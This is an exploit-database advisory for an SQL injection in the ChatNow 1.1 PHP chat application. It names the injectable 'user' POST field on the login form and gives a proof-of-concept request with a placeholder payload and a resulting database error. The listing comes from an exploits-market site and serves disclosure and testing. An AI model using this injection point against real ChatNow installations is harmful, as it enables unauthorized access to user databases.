[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ChatNow 1.1 SQL Injection Vulnerability

Author
ZwX
Risk
[
Security Risk High
]
0day-ID
0day-ID-26440
Category
web applications
Date add
29-11-2016
Platform
php
=====================================================
[#] Exploit Title : ChatNow 1.1 - SQL Injection Web Vulnerability
[#] Date Discovered : 2016-11-17
[#] Affected Product(s): chatNow v1.1 - Content Management System
[#] Exploitation Technique: Remote
[#] Severity Level: High
[#] Tested OS : Windows 10
=====================================================


[#] Product & Service Introduction:
===================================
Chat Open Source desenvolvido com PHP e MySQL. Com suporte para envio de videos do Youtube e imagens. Construido com jQuery.

(Copy of the Vendor Homepage: http://chatnow.thiagosf.net/ )


[#] Technical Details & Description:
====================================
A remote sql injection web vulnerability has been discovered  in the official chatNow v1.1 content management system.
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application.

The sql injection vulnerability is located in input name `user` which is found in the connection form. Remote attackers are able 
to execute own sql commands, the attack vector of the vulnerability is application-side and the request method to inject is POST.

Request Method(s): 
           [+] POST

Vulnerable Input (Name):
           [+] user


[#] Proof of Concept (PoC):
===========================
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: localhost/chatNow/
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/chatNow/chat/login.php
Cookie: PHPSESSID=3g7cs1mammh9p767oed1v187t0; __utma=32540652.120788788.1479381166.1479381166.1479381166.1; __utmb=32540652.5.10.1479381166; __utmc=32540652; __utmz=32540652.1479381166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
-
POST Method: user=[SQL INJECTION HERE]id_room=14&captcha=5253

--- PoC Error Logs ---
SELECT * FROM chat_users WHERE user = "1"'" ORDER BY id DESC
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''" ORDER BY id DESC' at line 1


[#] Vulnerability Disclosure Timeline:
======================================
2016-11-17 : Discovery of the Vulnerability
2016-11-17 : Contact the Vendor (No Response)
2016-11-28 : Public Disclosure

#  0day.today [2024-11-16]  #